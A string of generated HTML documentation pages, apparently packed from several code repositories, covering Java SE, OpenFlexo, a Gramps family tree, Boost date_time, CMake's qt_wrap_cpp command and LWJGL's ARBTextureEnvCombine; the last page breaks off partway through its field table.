name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../javax/print/attribute/standard/DocumentName.html" title="class in javax.print.attribute.standard">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> <div class="aboutLanguage"><strong>Java&trade;&nbsp;Platform<br>Standard&nbsp;Ed.&nbsp;8</strong></div> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?javax/print/attribute/standard/class-use/DocumentName.html" target="_top">Frames</a></li> <li><a href="DocumentName.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small><font size="-1"> <a href="http://bugreport.sun.com/bugreport/">Submit a bug or feature</a> <br>For further API reference and developer documentation, see <a href="http://download.oracle.com/javase/8/docs/index.html" target="_blank">Java SE Documentation</a>. That documentation contains more detailed, developer-targeted descriptions, with conceptual overviews, definitions of terms, workarounds, and working code examples.<br> Copyright &#x00a9; 1993, 2014, Oracle and/or its affiliates. All rights reserved. </font></small></p> </body> </html>
flexohelp/src/main/resources/Help/Default.helpset/HTML/FlexoDocResourceCenter/FlexoToolSet/wkf/wkf-main-pane/documentation/WKFDocumentationView/WKFDocumentationView.html
openflexo-team/openflexo-utils
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> <HTML> <HEAD> <TITLE> WKF Documentation view </TITLE> </HEAD> <BODY BGCOLOR="#ffffff"> <H1>WKF Documentation view</H1> <HR> No documentation<HR> <p><b>Extends</b> <a href="../../wkf-main-pane.html">wkf-main-pane</a></p><p><b>Related items</b> <a href="../documentation.html">documentation</a></p> </BODY> </HTML>
RossFamilyTree/fam/4/4/d15f5fd12ae30a37f20580e4b44.html
RossGammon/the-gammons.net
<!DOCTYPE html> <html xml:lang="en-GB" lang="en-GB" xmlns="http://www.w3.org/1999/xhtml"> <head lang="en-GB"> <title>Ross Gammon’s Family Tree - Family of CUTCLIFFE (LIVING, MALE), John Milton and NEMMO, Margaret</title> <meta charset="UTF-8" /> <meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" /> <meta name ="apple-mobile-web-app-capable" content="yes" /> <meta name="generator" content="Gramps 4.2.8 http://gramps-project.org/" /> <meta name="author" content="" /> <link href="../../../images/favicon2.ico" rel="shortcut icon" type="image/x-icon" /> <link href="../../../css/narrative-screen.css" media="screen" rel="stylesheet" type="text/css" /> <link href="../../../css/narrative-print.css" media="print" rel="stylesheet" type="text/css" /> </head> <body> <div id="header"> <h1 id="SiteTitle">Ross Gammon’s Family Tree</h1> </div> <div class="wrapper" id="nav" role="navigation"> <div class="container"> <ul class="menu" id="dropmenu"> <li><a href="../../../individuals.html" title="Individuals">Individuals</a></li> <li><a href="../../../index.html" title="Surnames">Surnames</a></li> <li class = "CurrentSection"><a href="../../../families.html" title="Families">Families</a></li> <li><a href="../../../events.html" title="Events">Events</a></li> <li><a href="../../../places.html" title="Places">Places</a></li> <li><a href="../../../sources.html" title="Sources">Sources</a></li> <li><a href="../../../repositories.html" title="Repositories">Repositories</a></li> <li><a href="../../../media.html" title="Media">Media</a></li> <li><a href="../../../thumbnails.html" title="Thumbnails">Thumbnails</a></li> </ul> </div> </div> <div class="content" id="RelationshipDetail"> <h2>Family of CUTCLIFFE (LIVING, MALE), John Milton and NEMMO, Margaret<sup><small></small></sup></h2> <div class="subsection" id="families"> <h4>Families</h4> <table class="infolist"> <tr class="BeginFamily"> <td class="ColumnType">Unknown</td> <td class="ColumnAttribute">Partner</td> <td class="ColumnValue"> <a href="../../../ppl/f/7/d15f5fd129a44cc9be186189f7f.html">CUTCLIFFE (LIVING, MALE), John Milton<span class="grampsid"> [I1836]</span></a> </td> </tr> <tr class="BeginFamily"> <td class="ColumnType">Unknown</td> <td class="ColumnAttribute">Partner</td> <td class="ColumnValue"> <a href="../../../ppl/9/4/d15f5fd3c485705aff4594e6d49.html">NEMMO, Margaret<span class="grampsid"> [I2096]</span></a> </td> </tr> <tr> <td class="ColumnType">&nbsp;</td> <td class="ColumnAttribute">&nbsp;</td> <td class="ColumnValue"> <table class="infolist eventlist"> <thead> <tr> <th class="ColumnEvent">Event</th> <th class="ColumnDate">Date</th> <th class="ColumnPlace">Place</th> <th class="ColumnDescription">Description</th> <th class="ColumnNotes">Notes</th> <th class="ColumnSources">Sources</th> </tr> </thead> <tbody> <tr> <td class="ColumnEvent"> <a href="../../../evt/3/7/d15f60bcfe42c2aa9ed63d6f873.html" title="Family (Primary)"> Family (Primary) <span class="grampsid"> [E21211]</span> </a> </td> <td class="ColumnDate">&nbsp;</td> <td class="ColumnPlace">&nbsp;</td> <td class="ColumnDescription">&nbsp;</td> <td class="ColumnNotes"> <div> </div> </td> <td class="ColumnSources"> <a href="#sref1a">1a</a> </td> </tr> </tbody> </table> </td> <tr> <td class="ColumnType">&nbsp;</td> <td class="ColumnAttribute">Children</td> <td class="ColumnValue"> <ol> <li> <a href="../../../ppl/7/b/d15f5fd3c5e1934cbe269a1eb7.html">CUTCLIFFE (LIVING, MALE), Living<span class="grampsid"> [I2097]</span></a> </li> </ol> </td> </tr> <tr> <td class="ColumnType">&nbsp;</td> <td class="ColumnAttribute">Attributes</td> <td class="ColumnValue"> <table class="infolist attrlist"> <thead> <tr> <th class="ColumnType">Type</th> <th class="ColumnValue">Value</th> <th class="ColumnNotes">Notes</th> <th class="ColumnSources">Sources</th> </tr> </thead> <tbody> <tr> <td class="ColumnType">_UID</td> <td class="ColumnValue">5D76B9E0691B6E41A2CB83B32F4E0F24F2F8</td> <td class="ColumnNotes"><div></div></td> <td class="ColumnSources">&nbsp;</td> </tr> </tbody> </table> </td> </tr> </tr> </table> </div> <div class="subsection" id="attributes"> <h4>Attributes</h4> <table class="infolist attrlist"> <thead> <tr> <th class="ColumnType">Type</th> <th class="ColumnValue">Value</th> <th class="ColumnNotes">Notes</th> <th class="ColumnSources">Sources</th> </tr> </thead> <tbody> <tr> <td class="ColumnType">_UID</td> <td class="ColumnValue">5D76B9E0691B6E41A2CB83B32F4E0F24F2F8</td> <td class="ColumnNotes"><div></div></td> <td class="ColumnSources">&nbsp;</td> </tr> </tbody> </table> </div> <div class="subsection" id="sourcerefs"> <h4>Source References</h4> <ol> <li> <a href="../../../src/5/0/d15f5fb6d26ad69bdfd4fe2605.html" title="Cutcliffe-Willis marriage, 4 Nov 1811, Combe Martin, Devon , England" name ="sref1"> Cutcliffe-Willis marriage, 4 Nov 1811, Combe Martin, Devon , England <span class="grampsid"> [S0202]</span> </a> <ol> <li id="sref1a"> <ul> <li> Page: No. 284 </li> <li> Confidence: Very High </li> <li> Source text: <div class="grampsstylednote"><p>&nbsp;</p><p>[Entry Recording Date : 4 NOV 1811]</p></div> </li> <li> General: <p></p> </li> </ul> </li> </ol> </li> </ol> </div> </div> <div class="fullclear"></div> <div id="footer"> <p id="createdate"> Generated by <a href="http://gramps-project.org/">Gramps</a> 4.2.8<br />Last change was the 2015-08-05 19:54:08<br />Created for <a href="../../../ppl/9/e/d15f5fb48902c4fc1b421d249e9.html">GAMMON, Francis</a> </p> <p id="copyright"> </p> </div> </body> </html>
boost_1_51_0/doc/html/boost/date_time/year_based_generator.html
tianyang-li/de-novo-rna-seq-quant-1
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"> <title>Class template year_based_generator</title> <link rel="stylesheet" href="../../../../doc/src/boostbook.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.76.1"> <link rel="home" href="../../index.html" title="The Boost C++ Libraries BoostBook Documentation Subset"> <link rel="up" href="../../date_time/doxy.html#header.boost.date_time.date_generators_hpp" title="Header &lt;boost/date_time/date_generators.hpp&gt;"> <link rel="prev" href="date_generator_parser.html" title="Class template date_generator_parser"> <link rel="next" href="partial_date.html" title="Class template partial_date"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table cellpadding="2" width="100%"><tr> <td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../boost.png"></td> <td align="center"><a href="../../../../index.html">Home</a></td> <td align="center"><a href="../../../../libs/libraries.htm">Libraries</a></td> <td align="center"><a href="http://www.boost.org/users/people.html">People</a></td> <td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td> <td align="center"><a href="../../../../more/index.htm">More</a></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="date_generator_parser.html"><img src="../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../../date_time/doxy.html#header.boost.date_time.date_generators_hpp"><img src="../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../index.html"><img src="../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="partial_date.html"><img src="../../../../doc/src/images/next.png" alt="Next"></a> </div> <div class="refentry"> <a name="boost.date_time.year_based_generator"></a><div class="titlepage"></div> <div class="refnamediv"> <h2><span class="refentrytitle">Class template year_based_generator</span></h2> <p>boost::date_time::year_based_generator &#8212; Base class for all generators that take a year and produce a date. </p> </div> <h2 xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv-title">Synopsis</h2> <div xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv"><pre class="synopsis"><span class="comment">// In header: &lt;<a class="link" href="../../date_time/doxy.html#header.boost.date_time.date_generators_hpp" title="Header &lt;boost/date_time/date_generators.hpp&gt;">boost/date_time/date_generators.hpp</a>&gt; </span><span class="keyword">template</span><span class="special">&lt;</span><span class="keyword">typename</span> date_type<span class="special">&gt;</span> <span class="keyword">class</span> <a class="link" href="year_based_generator.html" title="Class template year_based_generator">year_based_generator</a> <span class="special">{</span> <span class="keyword">public</span><span class="special">:</span> <span class="comment">// types</span> <span class="keyword">typedef</span> <span class="identifier">date_type</span><span class="special">::</span><span class="identifier">calendar_type</span> <a name="boost.date_time.year_based_generator.calendar_type"></a><span class="identifier">calendar_type</span><span class="special">;</span> <span class="keyword">typedef</span> <span class="identifier">calendar_type</span><span class="special">::</span><span class="identifier">year_type</span> <a name="boost.date_time.year_based_generator.year_type"></a><span class="identifier">year_type</span><span class="special">;</span> <span class="comment">// <a class="link" href="year_based_generator.html#boost.date_time.year_based_generatorconstruct-copy-destruct">construct/copy/destruct</a></span> <a class="link" href="year_based_generator.html#id447455-bb"><span class="identifier">year_based_generator</span></a><span class="special">(</span><span class="special">)</span><span class="special">;</span> <a class="link" href="year_based_generator.html#id447456-bb"><span class="special">~</span><span class="identifier">year_based_generator</span></a><span class="special">(</span><span class="special">)</span><span class="special">;</span> <span class="comment">// <a class="link" href="year_based_generator.html#id687676-bb">public member functions</a></span> <span class="identifier">date_type</span> <a class="link" href="year_based_generator.html#id447431-bb"><span class="identifier">get_date</span></a><span class="special">(</span><span class="identifier">year_type</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span> <span class="identifier">std</span><span class="special">::</span><span class="identifier">string</span> <a class="link" href="year_based_generator.html#id447444-bb"><span class="identifier">to_string</span></a><span class="special">(</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span> <span class="special">}</span><span class="special">;</span></pre></div> <div class="refsect1"> <a name="id1381517"></a><h2>Description</h2> <p>This class is a base class for polymorphic function objects that take a year and produce a concrete date. </p> <div class="refsect2"> <a name="id1381524"></a><h3> <a name="boost.date_time.year_based_generatorconstruct-copy-destruct"></a><code class="computeroutput">year_based_generator</code> public construct/copy/destruct</h3> <div class="orderedlist"><ol class="orderedlist" type="1"> <li class="listitem"><pre class="literallayout"><a name="id447455-bb"></a><span class="identifier">year_based_generator</span><span class="special">(</span><span class="special">)</span><span class="special">;</span></pre></li> <li class="listitem"><pre class="literallayout"><a name="id447456-bb"></a><span class="special">~</span><span class="identifier">year_based_generator</span><span class="special">(</span><span class="special">)</span><span class="special">;</span></pre></li> </ol></div> </div> <div class="refsect2"> <a name="id1381608"></a><h3> <a name="id687676-bb"></a><code class="computeroutput">year_based_generator</code> public member functions</h3> <div class="orderedlist"><ol class="orderedlist" type="1"> <li class="listitem"><pre class="literallayout"><span class="identifier">date_type</span> <a name="id447431-bb"></a><span class="identifier">get_date</span><span class="special">(</span><span class="identifier">year_type</span> y<span class="special">)</span> <span class="keyword">const</span><span class="special">;</span></pre></li> <li class="listitem"> <pre class="literallayout"><span class="identifier">std</span><span class="special">::</span><span class="identifier">string</span> <a name="id447444-bb"></a><span class="identifier">to_string</span><span class="special">(</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span></pre>Returns a string for use in a POSIX time_zone string. </li> </ol></div> </div> </div> </div> <table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr> <td align="left"></td> <td align="right"><div class="copyright-footer">Copyright &#169; 2001-2005 CrystalClear Software, Inc<p>Subject to the Boost Software License, Version 1.0. (See accompanying file <code class="filename">LICENSE_1_0.txt</code> or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>)</p> </div></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="date_generator_parser.html"><img src="../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../../date_time/doxy.html#header.boost.date_time.date_generators_hpp"><img src="../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../index.html"><img src="../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="partial_date.html"><img src="../../../../doc/src/images/next.png" alt="Next"></a> </div> </body> </html>
platform/linux/support/cmake/doc/cmake/html/command/qt_wrap_cpp.html
libcrosswind/libcrosswind
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>qt_wrap_cpp &mdash; CMake 3.15.2 Documentation</title> <link rel="stylesheet" href="../_static/cmake.css" type="text/css" /> <link rel="stylesheet" href="../_static/pygments.css" type="text/css" /> <script type="text/javascript" src="../_static/documentation_options.js"></script> <script type="text/javascript" src="../_static/jquery.js"></script> <script type="text/javascript" src="../_static/underscore.js"></script> <script type="text/javascript" src="../_static/doctools.js"></script> <link rel="shortcut icon" href="../_static/cmake-favicon.ico"/> <link rel="index" title="Index" href="../genindex.html" /> <link rel="search" title="Search" href="../search.html" /> <link rel="next" title="qt_wrap_ui" href="qt_wrap_ui.html" /> <link rel="prev" title="output_required_files" href="output_required_files.html" /> </head><body> <div class="related" role="navigation" aria-label="related navigation"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../genindex.html" title="General Index" accesskey="I">index</a></li> <li class="right" > <a href="qt_wrap_ui.html" title="qt_wrap_ui" accesskey="N">next</a> |</li> <li class="right" > <a href="output_required_files.html" title="output_required_files" accesskey="P">previous</a> |</li> <li> <img src="../_static/cmake-logo-16.png" alt="" style="vertical-align: middle; margin-top: -2px" /> </li> <li> <a href="https://cmake.org/">CMake</a> &#187; </li> <li> <a href="../index.html">3.15.2 Documentation</a> &#187; </li> <li class="nav-item nav-item-1"><a href="../manual/cmake-commands.7.html" accesskey="U">cmake-commands(7)</a> &#187;</li> </ul> </div> <div class="document"> <div class="documentwrapper"> <div class="bodywrapper"> <div class="body" role="main"> <div class="section" id="qt-wrap-cpp"> <span id="command:qt_wrap_cpp"></span><h1>qt_wrap_cpp<a class="headerlink" href="#qt-wrap-cpp" title="Permalink to this headline">¶</a></h1> <div class="deprecated"> <p><span class="versionmodified">Deprecated since version 3.14: </span>This command was originally added to support Qt 3 before the <span class="target" id="index-0-command:add_custom_command"></span><a class="reference internal" href="add_custom_command.html#command:add_custom_command" title="add_custom_command"><code class="xref cmake cmake-command docutils literal notranslate"><span class="pre">add_custom_command()</span></code></a> command was sufficiently mature. The <span class="target" id="index-0-module:FindQt4"></span><a class="reference internal" href="../module/FindQt4.html#module:FindQt4" title="FindQt4"><code class="xref cmake cmake-module docutils literal notranslate"><span class="pre">FindQt4</span></code></a> module provides the <code class="docutils literal notranslate"><span class="pre">qt4_wrap_cpp()</span></code> macro, which should be used instead for Qt 4 projects. For projects using Qt 5 or later, use the equivalent macro provided by Qt itself (e.g. Qt 5 provides <code class="docutils literal notranslate"><span class="pre">qt5_wrap_cpp()</span></code>).</p> </div> <p>Manually create Qt Wrappers.</p> <div class="highlight-cmake notranslate"><div class="highlight"><pre><span></span><span class="nf">qt_wrap_cpp(</span><span class="nb">resultingLibraryName</span><span class="w"> </span><span class="nb">DestName</span><span class="w"> </span><span class="nb">SourceLists</span><span class="w"> </span><span class="p">...</span><span class="nf">)</span><span class="w"></span> </pre></div> </div> <p>Produces moc files for all the .h files listed in the SourceLists. The moc files will be added to the library using the <code class="docutils literal notranslate"><span class="pre">DestName</span></code> source list.</p> <p>Consider updating the project to use the <span class="target" id="index-0-prop_tgt:AUTOMOC"></span><a class="reference internal" href="../prop_tgt/AUTOMOC.html#prop_tgt:AUTOMOC" title="AUTOMOC"><code class="xref cmake cmake-prop_tgt docutils literal notranslate"><span class="pre">AUTOMOC</span></code></a> target property instead for a more automated way of invoking the <code class="docutils literal notranslate"><span class="pre">moc</span></code> tool.</p> </div> </div> </div> </div> <div class="sphinxsidebar" role="navigation" aria-label="main navigation"> <div class="sphinxsidebarwrapper"> <h4>Previous topic</h4> <p class="topless"><a href="output_required_files.html" title="previous chapter">output_required_files</a></p> <h4>Next topic</h4> <p class="topless"><a href="qt_wrap_ui.html" title="next chapter">qt_wrap_ui</a></p> <div role="note" aria-label="source link"> <h3>This Page</h3> <ul class="this-page-menu"> <li><a href="../_sources/command/qt_wrap_cpp.rst.txt" rel="nofollow">Show Source</a></li> </ul> </div> <div id="searchbox" style="display: none" role="search"> <h3>Quick search</h3> <div class="searchformwrapper"> <form class="search" action="../search.html" method="get"> <input type="text" name="q" /> <input type="submit" value="Go" /> <input type="hidden" name="check_keywords" value="yes" /> <input type="hidden" name="area" value="default" /> </form> </div> </div> <script type="text/javascript">$('#searchbox').show(0);</script> </div> </div> <div class="clearer"></div> </div> <div class="related" role="navigation" aria-label="related navigation"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../genindex.html" title="General Index" >index</a></li> <li class="right" > <a href="qt_wrap_ui.html" title="qt_wrap_ui" >next</a> |</li> <li class="right" > <a href="output_required_files.html" title="output_required_files" >previous</a> |</li> <li> <img src="../_static/cmake-logo-16.png" alt="" style="vertical-align: middle; margin-top: -2px" /> </li> <li> <a href="https://cmake.org/">CMake</a> &#187; </li> <li> <a href="../index.html">3.15.2 Documentation</a> &#187; </li> <li class="nav-item nav-item-1"><a href="../manual/cmake-commands.7.html" >cmake-commands(7)</a> &#187;</li> </ul> </div> <div class="footer" role="contentinfo"> &#169; Copyright 2000-2019 Kitware, Inc. and Contributors. Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.7.2. </div> </body> </html>
JarFiles/Libs/lwjgl/javadoc/org/lwjgl/opengl/ARBTextureEnvCombine.html
Troy-Ingel/A4Wave
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_14) on Wed May 30 20:32:13 CEST 2012 --> <TITLE> ARBTextureEnvCombine (LWJGL API) </TITLE> <META NAME="date" CONTENT="2012-05-30"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="ARBTextureEnvCombine (LWJGL API)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/ARBTextureEnvCombine.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../org/lwjgl/opengl/ARBTextureCubeMapArray.html" title="class in org.lwjgl.opengl"><B>PREV CLASS</B></A>&nbsp; &nbsp;<A HREF="../../../org/lwjgl/opengl/ARBTextureEnvDot3.html" title="class in org.lwjgl.opengl"><B>NEXT CLASS</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../index.html?org/lwjgl/opengl/ARBTextureEnvCombine.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="ARBTextureEnvCombine.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> <TR> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> SUMMARY:&nbsp;NESTED&nbsp;|&nbsp;<A HREF="#field_summary">FIELD</A>&nbsp;|&nbsp;CONSTR&nbsp;|&nbsp;<A HREF="#methods_inherited_from_class_java.lang.Object">METHOD</A></FONT></TD> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> DETAIL:&nbsp;<A HREF="#field_detail">FIELD</A>&nbsp;|&nbsp;CONSTR&nbsp;|&nbsp;METHOD</FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <!-- ======== START OF CLASS DATA ======== --> <H2> <FONT SIZE="-1"> org.lwjgl.opengl</FONT> <BR> Class ARBTextureEnvCombine</H2> <PRE> java.lang.Object <IMG SRC="../../../resources/inherit.gif" ALT="extended by "><B>org.lwjgl.opengl.ARBTextureEnvCombine</B> </PRE> <HR> <DL> <DT><PRE>public final class <B>ARBTextureEnvCombine</B><DT>extends java.lang.Object</DL> </PRE> <P> <HR> <P> <!-- =========== FIELD SUMMARY =========== --> <A NAME="field_summary"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Field Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_ADD_SIGNED_ARB">GL_ADD_SIGNED_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_COMBINE_ALPHA_ARB">GL_COMBINE_ALPHA_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_COMBINE_ARB">GL_COMBINE_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_COMBINE_RGB_ARB">GL_COMBINE_RGB_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_CONSTANT_ARB">GL_CONSTANT_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_INTERPOLATE_ARB">GL_INTERPOLATE_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_OPERAND0_ALPHA_ARB">GL_OPERAND0_ALPHA_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_OPERAND0_RGB_ARB">GL_OPERAND0_RGB_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_OPERAND1_ALPHA_ARB">GL_OPERAND1_ALPHA_ARB</A></B></CODE> <BR> 